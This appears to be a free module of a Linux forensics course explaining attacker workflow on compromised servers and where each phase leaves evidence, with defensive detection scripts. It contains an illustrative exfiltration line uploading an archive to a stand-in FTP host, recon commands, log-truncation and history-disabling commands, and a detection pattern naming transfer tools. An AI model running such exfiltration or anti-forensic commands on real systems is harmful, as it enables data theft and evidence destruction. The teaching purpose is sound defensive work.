LX0.5 The Attacker's Perspective
Why Attackers Target Linux — and What They Do When They Get In
Why Linux Gets Compromised
Linux has a reputation for security that is partially earned and partially mythological. The earned part: Linux’s permission model, mandatory access control frameworks (SELinux, AppArmor), and open-source visibility make it possible to build extremely hardened systems. The mythological part: the assumption that Linux does not get compromised because it is inherently more secure than Windows.
The reality in production environments is different. Linux servers get compromised for reasons that have nothing to do with the operating system’s theoretical security model and everything to do with how they are deployed and managed in practice.
Internet-facing services with known vulnerabilities. Linux runs the majority of the world’s web servers, mail servers, DNS servers, and application infrastructure. Every internet-facing service is an attack surface. When a vulnerability is published for Apache, Nginx, PHP, WordPress, Jenkins, GitLab, Redis, Elasticsearch, or any of the thousands of applications that run on Linux servers, the window between publication and exploitation is measured in hours. The organization that patches in weeks has a weeks-long exposure window. The Northgate Engineering scenario in this course’s opening begins with exactly this pattern — a vulnerable PHP application behind an Nginx reverse proxy.
Weak SSH credential management. SSH brute force is the most common attack against Linux servers because it works. Organizations deploy servers with password authentication enabled, use weak or default passwords for service accounts, leave root SSH login enabled, and fail to implement key-based authentication or fail2ban rate limiting. The attacker does not need a sophisticated exploit — they need patience and a password list. LX4 investigates this pattern in detail.
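The brute-force pattern is visible directly in the authentication log. A minimal triage sketch — it uses an inline sample in place of /var/log/auth.log (the Debian-family path; RHEL-family systems use /var/log/secure) so the pipeline is self-contained:

```shell
# Count failed SSH logins per source IP. On a live system, point this at
# /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL); the inline
# sample below is illustrative data, not real log content.
sample=$(mktemp)
cat > "$sample" <<'EOF'
Feb  3 01:14:02 web01 sshd[4210]: Failed password for root from 203.0.113.77 port 51234 ssh2
Feb  3 01:14:05 web01 sshd[4211]: Failed password for root from 203.0.113.77 port 51240 ssh2
Feb  3 01:14:09 web01 sshd[4212]: Failed password for admin from 203.0.113.77 port 51251 ssh2
Feb  3 01:20:33 web01 sshd[4290]: Accepted password for deploy from 198.51.100.9 port 40022 ssh2
EOF
# Many failures from one address -- sometimes followed by a single
# "Accepted" -- is the classic brute-force signature.
counts=$(grep 'Failed password' "$sample" | awk '{print $(NF-3)}' | sort | uniq -c | sort -rn)
echo "$counts"
rm -f "$sample"
```

Against a real log, the same pipeline surfaces the loudest source addresses first; any "Accepted" line from one of those addresses should then be correlated with wtmp.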
Infrequent patching. Linux servers are often treated as “deploy and forget” infrastructure. The web server was deployed in 2022, configured once, and has not been updated since. The kernel has known privilege escalation vulnerabilities. The web application has known remote code execution vulnerabilities. The organization’s patch management process covers Windows endpoints and ignores Linux servers because “Linux is more secure.” LX6 investigates the privilege escalation patterns that result from this assumption.
No endpoint detection. The majority of Linux servers in production environments do not have EDR (Endpoint Detection and Response) agents installed. The Windows endpoints in the same organization have CrowdStrike, SentinelOne, or Defender for Endpoint. The Linux servers have nothing — no process monitoring, no network monitoring, no file integrity monitoring, no behavioral detection. The attacker who compromises a Linux server operates in an environment with near-zero detection capability. This course teaches you to investigate without EDR — using the native Linux evidence sources that exist regardless of whether a security agent is installed.
Container and cloud misconfigurations. Docker containers running as root. Kubernetes pods with privileged access. AWS EC2 instances with overly permissive IAM roles. Azure VMs with managed identity access to Key Vault. GCP instances with service account keys stored in environment variables. These misconfigurations are not Linux vulnerabilities — they are deployment errors that give the attacker a path from initial access to infrastructure-wide compromise. LX9 and LX10 investigate these patterns.
The Attacker’s Typical Workflow
Understanding the attacker’s workflow is not just academic — it directly informs the investigation sequence. Attackers follow a predictable pattern, and each step leaves specific artifacts in specific locations.
Step 1: Initial access. The attacker gains a foothold on the system through one of four primary vectors: SSH credential compromise (brute force, password spray, or stolen credentials), web application exploitation (SQL injection, file upload bypass, deserialization vulnerability, SSRF), exposed service exploitation (Redis without authentication, Elasticsearch without authentication, vulnerable Jenkins instance), or supply chain compromise (malicious package, compromised container image, poisoned CI/CD pipeline).
The evidence of initial access depends on the vector. SSH compromise leaves trails in auth.log and wtmp. Web application exploitation leaves trails in web server access logs and error logs. Exposed service exploitation may leave trails in the service’s own log files (Redis logs, Elasticsearch logs) or may be entirely silent if the service does not log connections. Supply chain compromise is the hardest to detect because the malicious code arrives through a trusted channel.
Step 2: Reconnaissance. Within minutes of gaining access, the attacker runs commands to understand the environment:
- whoami — what user am I?
- id — what groups am I in?
- uname -a — what kernel version, and are there known privilege escalation exploits?
- cat /etc/os-release — what distribution and version?
- cat /etc/passwd — what other user accounts exist?
- ss -tlnp — what services are listening?
- df -h — what filesystems are mounted, and how much data is there?
- cat /etc/crontab — what scheduled tasks exist?
- sudo -l — what can I run as root?
These commands may appear in .bash_history if the attacker uses an interactive shell. They will appear in auditd logs if auditd is configured. They will not appear anywhere else — this is the “dark zone” of Linux forensics where activity occurs but is not recorded by default. One of the core recommendations of this course is deploying auditd rules that illuminate this dark zone before the next incident occurs.
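A minimal rule set that illuminates this dark zone might look like the following — a sketch for a drop-in file such as /etc/audit/rules.d/50-exec.rules (the filename and the cmd_exec key are our labels, not a standard):

```
## Record every process execution at the system call level
-a always,exit -F arch=b64 -S execve -k cmd_exec
-a always,exit -F arch=b32 -S execve -k cmd_exec
```

Load the rules with augenrules --load, then retrieve recorded commands with ausearch -k cmd_exec. The b32 rule matters because an attacker can invoke 32-bit binaries to slip past a 64-bit-only rule.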
Step 3: Persistence. The attacker establishes mechanisms to maintain access: SSH key deployment (adding their public key to ~/.ssh/authorized_keys), cron job creation (a scheduled task that re-downloads and executes their payload), systemd service installation (a service that starts on boot), or more advanced techniques like shared library injection (/etc/ld.so.preload) and PAM module backdoors.
The evidence of persistence exists in the persistence mechanisms themselves — each is a file on the filesystem with a creation timestamp that correlates with the compromise timeline. LX7 investigates every persistence mechanism in detail.
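Because each mechanism is a file with a timestamp, a sweep of the common locations is a quick first pass. A sketch, assuming GNU stat and default Debian/RHEL paths — the function name is ours:

```shell
# Sweep common persistence locations under a mount point and print each
# file with its inode-change time (ctime), owner, and path. $1 defaults
# to / for a live system; point it at a mounted disk image for dead-box
# analysis. The path list is a starting set, not exhaustive.
persistence_sweep() {
  local root="${1:-/}"
  for p in \
      "$root"/home/*/.ssh/authorized_keys \
      "$root"/root/.ssh/authorized_keys \
      "$root"/etc/cron.d/* \
      "$root"/etc/systemd/system/*.service \
      "$root"/etc/ld.so.preload; do
    # Unmatched globs stay literal, so check existence before stat.
    [ -e "$p" ] && stat -c '%z  %U  %n' "$p"   # GNU stat: ctime, owner, path
  done | sort
}
```

Files whose ctime falls inside the compromise window go straight onto the timeline.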
Step 4: Privilege escalation. If the attacker gained access as a non-root user (common with web application compromise, where the initial shell runs as www-data), they escalate to root. The most common techniques: exploiting a SUID binary with a known vulnerability (PwnKit, DirtyCOW successors), exploiting a kernel vulnerability, abusing a sudo misconfiguration, or escaping a container to the host.
The evidence of privilege escalation appears in auditd logs (if configured) as execve system calls for SUID binaries by non-root users, in kernel logs (dmesg, kern.log) as crash reports or unusual kernel messages, and in filesystem artifacts as newly created files owned by root in directories writable by the attacker’s initial user.
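When auditd was not configured, the filesystem itself still narrows the search. One hedged sketch (the function name is ours; it assumes GNU find): list SUID binaries by modification time, since a newly planted or recently replaced SUID binary inside the compromise window is a strong escalation lead.

```shell
# Flag SUID binaries under a search root, newest first. Default root is
# /usr to keep the demo fast; widen to / (and drop -xdev as needed) on a
# real triage pass.
suid_audit() {
  local root="${1:-/usr}"
  # %T@ = mtime as epoch seconds, %u = owner, %p = path (GNU find)
  find "$root" -xdev -type f -perm -4000 -printf '%T@ %u %p\n' 2>/dev/null \
    | sort -rn | head -20
}
```

Compare the resulting list against the distribution's known SUID set; anything unexpected, or anything with a timestamp in the incident window, deserves a hash lookup.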
Step 5: Objective execution. The attacker achieves their goal: deploying a cryptominer for revenue, exfiltrating data for sale or espionage, deploying ransomware for extortion, establishing a persistent foothold for future operations, or using the server as a pivot point for lateral movement to higher-value targets.
The evidence of objective execution varies by objective. Cryptominers leave process artifacts, network connections to mining pools, and high CPU utilization records. Data exfiltration leaves file access records (if auditd is configured), network connection records, and potentially command history showing tar, scp, curl, or wget commands. Ransomware leaves encrypted files, ransom notes, and the encryption binary. Lateral movement leaves SSH connection records in auth.log on both the source and destination systems.
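Command history, when it survives, often captures the staging step directly. A self-contained sketch using inline sample data — on a real system, loop the same grep over /root/.bash_history and /home/*/.bash_history:

```shell
# Grep a shell history for common staging/exfiltration tooling. The
# history content below is an illustrative sample, not real data.
hist=$(mktemp)
cat > "$hist" <<'EOF'
cd /var/www
tar czf /tmp/.cache.tgz html/
curl -T /tmp/.cache.tgz ftp://203.0.113.50/drop/
ls -la
EOF
# -n keeps line numbers so hits can be cited in the timeline.
exfil_hits=$(grep -nE '\b(tar|scp|rsync|curl|wget|nc)\b' "$hist")
echo "$exfil_hits"
rm -f "$hist"
```

These tool names also appear in legitimate admin work, so each hit is a lead to corroborate against network records, not a conclusion.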
The Anti-Forensics Problem — and Why It Fails
Attackers know about auth.log and .bash_history. The more capable ones attempt to destroy this evidence. But complete evidence destruction on Linux is harder than most attackers realize, because the evidence is distributed across so many independent sources.
An attacker who truncates auth.log (> /var/log/auth.log) removes the authentication event history — but wtmp still records their login sessions, the systemd journal still contains the SSH events in a separate binary file, and if auditd is running, the authentication events are also recorded in audit.log. To truly eliminate all authentication evidence, the attacker must address four independent log sources. Most attackers address one or two.
An attacker who runs unset HISTFILE prevents their commands from being written to .bash_history — but auditd (if configured with -a always,exit -F arch=b64 -S execve) records every command execution at the system call level, regardless of what the shell does with its history. The attacker can defeat bash history but cannot defeat auditd without root access and specific knowledge of how to disable it without being logged doing so.
An attacker who uses touch to backdate a file’s modification time can fool a naive investigator who only checks mtime — but the ctime (inode change time) updates automatically and cannot be set by userspace tools. The discrepancy between mtime and ctime is itself evidence of tampering.
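The mismatch is easy to demonstrate. A minimal sketch with GNU touch and stat on a throwaway file:

```shell
# touch -d backdates mtime, but ctime is set by the kernel on every inode
# change and cannot be backdated from ordinary userspace tools -- the
# resulting gap is the tell.
f=$(mktemp)
touch -d '2020-01-01 00:00:00' "$f"
mtime=$(stat -c %Y "$f")   # modification time, epoch seconds
ctime=$(stat -c %Z "$f")   # inode change time, epoch seconds
echo "mtime=$mtime ctime=$ctime"
# On a timestomped file, ctime is far newer than mtime:
[ "$ctime" -gt "$mtime" ] && echo "mtime/ctime mismatch: possible timestomping"
rm -f "$f"
```

Note the converse does not hold: a large gap also appears benignly (e.g., after chmod or chown on an old file), so treat the mismatch as corroborating evidence, not proof.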
An attacker who installs a rootkit to hide processes from ps can evade userspace detection tools — but a memory dump analyzed with Volatility 3 reads the kernel’s process list directly, bypassing the rootkit’s userspace hooks. The rootkit hides the process from ps. It cannot hide it from a memory dump.
The principle: the attacker must defeat every evidence source simultaneously. Missing even one source leaves a trail. Investigators who check multiple sources catch the evidence that the attacker’s anti-forensic technique did not cover. This is why the cross-correlation approach — checking authentication across auth.log AND wtmp AND journal AND auditd — is the foundation of Linux investigation methodology.
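The cross-correlation idea can be sketched as a set difference between two session lists. In this bash-only illustration (process substitution is a bashism), the inline lists stand in for parsed output of `last -f /var/log/wtmp` and a grep of auth.log; sessions present in wtmp but missing from auth.log are the tampering signal:

```shell
# Simulated session lists: wtmp is intact, auth.log was truncated by the
# attacker after their first login. Data is illustrative.
wtmp_sessions=$(printf '%s\n' \
  'deploy 198.51.100.9 Feb03-01:20' \
  'root   203.0.113.77 Feb03-01:31')
authlog_sessions=$(printf '%s\n' \
  'deploy 198.51.100.9 Feb03-01:20')
# comm(1) needs sorted input; -23 keeps lines unique to the first list,
# i.e. sessions recorded in wtmp but absent from auth.log.
missing=$(comm -23 <(echo "$wtmp_sessions" | sort) <(echo "$authlog_sessions" | sort))
echo "Sessions in wtmp but not auth.log (possible log tampering):"
echo "$missing"
```

The same comparison extends to the journal and auditd: any source that disagrees with the others is either misconfigured or tampered with, and both answers matter to the investigation.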
Worked artifact — Attacker workflow reconstruction template:
Complete this timeline as you identify evidence of each attack phase.
Case: INC-2026-XXXX | System: [hostname]
Initial access: Method: ___ | Source: ___ | Timestamp: ___
Reconnaissance: Commands: ___ | Evidence: bash_history / auditd
Persistence: ☐ SSH key ☐ Cron ☐ Systemd ☐ ld.so.preload ☐ Other
Privilege escalation: Method: ___ | Root achieved: ☐ Yes ☐ No
Objective: ☐ Cryptomining ☐ Data exfil ☐ Lateral movement ☐ Ransomware ☐ Botnet
Anti-forensics: ☐ History deleted ☐ Logs truncated ☐ Timestamps faked ☐ Rootkit
Myth: “Linux servers are targeted less frequently than Windows, so they need less monitoring.”
Reality: Linux runs 96% of the world’s top 1 million web servers, the majority of cloud infrastructure, and nearly all container workloads. The perception that Linux is “less targeted” comes from lower visibility — most Linux servers lack EDR agents and centralized logging. Linux servers are compromised at rates comparable to their Windows counterparts; the compromises are simply detected less often and later. Cryptomining campaigns specifically target Linux because always-on, high-CPU servers are ideal for mining — and the absence of monitoring means miners run undetected for weeks.
Decision points: predicting the next attack phase
If you have identified initial access, predict the next steps:
- SSH brute force → check authorized_keys, bash history, and /tmp for dropped tools.
- Web exploit → check the web root for web shells, the process tree for reverse shells, and evidence of privilege escalation to root.
- Stolen cloud credentials → check CloudTrail for API calls, new IAM roles, and lateral movement to other resources.
Troubleshooting: when the attacker’s workflow is unclear
No bash history and no auditd. Pivot to: filesystem timestamps (find -mtime), package manager logs, network connections, /proc enumeration.
Multiple persistence mechanisms found. Attackers deploy redundant persistence — document ALL before recommending eradication. Missing one means the attacker returns.
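A combined workflow-trace sketch for the Try-it exercise that follows. Everything here is read-only; run it as root for full history coverage. The paths assume default Debian/RHEL layouts, and the port list is a commonly seen — not exhaustive — set of mining-pool ports, so treat both as assumptions to tune:

```shell
# Collect the three quick checks into one report: recon commands in shell
# histories, recently changed persistence files, and outbound connections
# on common mining-pool ports. On a quiet system the sections print empty.
report=$(
  echo '== Recon commands in shell histories =='
  grep -HnE '^(whoami|id|uname -a|sudo -l)\b|/etc/(passwd|crontab)' \
    /root/.bash_history /home/*/.bash_history 2>/dev/null || true
  echo '== authorized_keys and systemd units, newest first (by ctime) =='
  ls -lt --time=ctime /home/*/.ssh/authorized_keys /root/.ssh/authorized_keys \
    /etc/systemd/system/*.service 2>/dev/null | head || true
  echo '== Outbound connections on common mining-pool ports =='
  ss -tn 2>/dev/null | grep -E ':(3333|4444|5555|7777|14444)\b' || true
)
echo "$report"
```

Empty sections are not a clean bill of health — they may mean the attacker used unset HISTFILE or a non-interactive shell, which is exactly why the auditd rules discussed earlier matter.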
Try it: On a Linux system, run the attacker workflow trace commands from the code block above. Check whether your system has evidence of reconnaissance commands in any user’s bash history. Check whether any systemd services or authorized_keys files were created after the OS installation. Check for outbound connections on common mining pool ports. You are practicing the same evidence checks you will use in every investigation scenario in this course.
Check your understanding:
- List three reasons why Linux servers are compromised in practice, despite the operating system’s security capabilities.
- An attacker gains access via SSH brute force, deploys an SSH key for persistence, and then truncates auth.log. What evidence of their activity still exists?
- What reconnaissance commands does a typical attacker run immediately after gaining access, and where might the evidence of these commands be found?
- Why is the absence of an EDR agent on a Linux server both a disadvantage for detection and a non-issue for investigation methodology?
You're reading the free modules of this course
The full course continues with advanced topics, production detection rules, worked investigation scenarios, and deployable artifacts. Premium subscribers get access to all courses.